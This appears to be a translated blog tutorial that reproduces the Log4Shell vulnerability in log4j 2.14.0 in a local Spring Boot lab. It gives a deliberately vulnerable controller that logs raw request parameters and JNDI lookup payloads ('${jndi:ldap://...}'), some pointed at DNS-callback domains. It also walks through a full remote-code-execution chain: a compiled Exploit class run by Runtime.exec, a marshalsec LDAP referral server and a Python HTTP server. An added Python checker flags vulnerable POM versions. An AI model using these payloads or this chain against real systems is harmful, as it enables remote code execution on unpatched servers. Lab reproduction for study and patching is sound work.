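Environment: jdk1.8.0_121, Win11, log4j 2.14.0
1. Create a Spring Boot web project in IDEA and add the dependencies
Installing IDEA: 1. The WeChat official account 软件管家. 2. Search Baidu yourself.
Create a new Spring Boot web project. Search Baidu yourself for how.
Add the following dependencies, namely log4j-core and log4j-api.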
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.0</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j -->
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.14.0</version>
</dependency>
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-web</artifactId>
    <exclusions>
        <!-- Exclude the default logging starter: use log4j2 instead of logback -->
        <exclusion>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-logging</artifactId>
        </exclusion>
    </exclusions>
</dependency>
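An added example (not part of the original post): a Python check that reads a pom.xml and reports whether its log4j-core dependency falls in the range affected by CVE-2021-44228, as the 2.14.0 pinned above does. The function names and the sample POM are constructed for illustration, and the version range is an assumption taken from Apache's advisory.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: two dependencies from this page, wrapped in a root element.
SAMPLE_POM = """<dependencies>
<dependency><groupId>org.apache.logging.log4j</groupId>
  <artifactId>log4j-core</artifactId><version>2.14.0</version></dependency>
<dependency><groupId>org.apache.logging.log4j</groupId>
  <artifactId>log4j-api</artifactId><version>2.14.0</version></dependency>
</dependencies>"""

# Assumption (Apache advisory for CVE-2021-44228): log4j-core 2.0-beta9 through
# 2.14.1 is affected; 2.3.1+ (Java 6) and 2.12.2+ (Java 7) are patched backports.
FIRST_FIXED = (2, 15, 0)


def parse_version(text):
    """Return (major, minor, patch), or None for anything unparsable."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(?:alpha|beta|rc)\d*)?$", text.strip())
    return tuple(int(g or 0) for g in m.groups()) if m else None


def classify(raw_version):
    """Map a version string to 'affected', 'not-affected' or 'unresolved'."""
    ver = parse_version(raw_version)
    if ver is None:
        return "unresolved"  # e.g. ${log4j.version} or a managed version
    backport = (ver[:2] == (2, 3) and ver[2] >= 1) or (ver[:2] == (2, 12) and ver[2] >= 2)
    if (2, 0, 0) <= ver < FIRST_FIXED and not backport:
        return "affected"  # conservatively includes 2.0 pre-releases before beta9
    return "not-affected"


def find_log4j_core(pom_xml):
    """Return (version, status) for every log4j-core dependency in the POM text."""
    # Drop the default Maven namespace, if present, so tags match by plain name.
    root = ET.fromstring(re.sub(r'\sxmlns="[^"]+"', "", pom_xml, count=1))
    findings = []
    for dep in root.iter("dependency"):
        # Only log4j-core is checked; log4j-api alone is not flagged.
        if (dep.findtext("groupId", "").strip() == "org.apache.logging.log4j"
                and dep.findtext("artifactId", "").strip() == "log4j-core"):
            raw = dep.findtext("version", "").strip()
            findings.append((raw, classify(raw)))
    return findings


if __name__ == "__main__":
    print(find_log4j_core(SAMPLE_POM))
```

An "unresolved" result means the version comes from a property or from dependency management, so the effective POM has to be inspected instead.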
Create HelloControllerTest to check that the Spring Boot project was set up correctly.
Once it is created, start the Spring Boot project and visit localhost:8080/hello to test it.
package com.example.controller;

import org.springframework.boot.autoconfigure.EnableAutoConfiguration;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RestController;

@EnableAutoConfiguration
@RestController
public class HelloControllerTest {
    @GetMapping("/hello")
    public String hello() {
        return "hello";
    }
}
Create Log4jController to test whether the lookup mechanism resolves ${} expressions.
package com.example.controller;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.context.annotation.ImportResource;
import javax.naming.NamingException;
import java.io.IOException;

public class Log4jController {
    private static final Logger logger = LogManager.getLogger(Log4jController.class);

    public static void main(String... args) throws IOException, NamingException {
        logger.error("${java:version}");
        logger.error("${java:vm}");
        logger.error("${java:runtime}");
        logger.error("${jndi:ldap://1ez6ai.dnslog.cn/hello}");
        logger.error("${java:hw}");
        logger.error("${java:os}");
    }
}
Create HelloController, used to test and exploit the vulnerability.
package com.example.controller;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.boot.autoconfigure.EnableAutoConfiguration;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.*;

@RestController
@EnableAutoConfiguration // auto-configuration
public class HelloController {
    private static final Logger mLogger = LogManager.getLogger(HelloController.class);

    @GetMapping(value = "/log4j_inject")
    @ResponseBody
    public String log4j_inject() {
        // Lab setting: lets the JNDI LDAP provider load classes from a remote codebase
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        mLogger.error("${jndi:ldap://127.0.0.1:8081/#Exploit}");
        //mLogger.error("${java:os}"); // print the current OS information
        // mLogger.error("${jndi:ldap://wmxh8n.dnslog.cn/xxx}"); // dnslog test
        return "hello,log4j2";
    }

    @RequestMapping(value = "/test", method = RequestMethod.GET)
    @ResponseBody
    public String log4j_test01(@RequestParam(value = "username") String username) {
        // The request parameter is written to the log unmodified
        mLogger.error(username);
        return "this_is_test";
    }
}
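The HelloController test result is as follows.
The Log4jController test result is as follows; the related information was printed.
Exploitation
An attacker-side server has to be set up first.
1. Download marshalsec-master from GitHub and run the following in the extracted directory (requires network access, and Maven installed with its environment variables configured):
mvn clean package -DskipTests
Result after running it
2. Prepare the exploit program, Exploit.java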
public class Exploit {
    public Exploit() {
        try {
            String[] commands = {"calc.exe"};
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] argv) {
        Exploit e = new Exploit();
    }
}
3. Compile the file with the javac from Java 1.8.0_121; this generates a class file in the current directory.
javac Exploit.java
Start an HTTP service in the directory containing Exploit.java, using Python's http.server.
python3 -m http.server 8800
Start the service on the specified port from the following directory, i.e. the one that mvn just built.
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "127.0.0.1:8800/#Exploit" 8081
4. Once the services are running, run the application again.
Visit localhost:8080/log4j_inject and the calculator pops up.
From: https://www.cnblogs.com/jdslf/p/16867029.html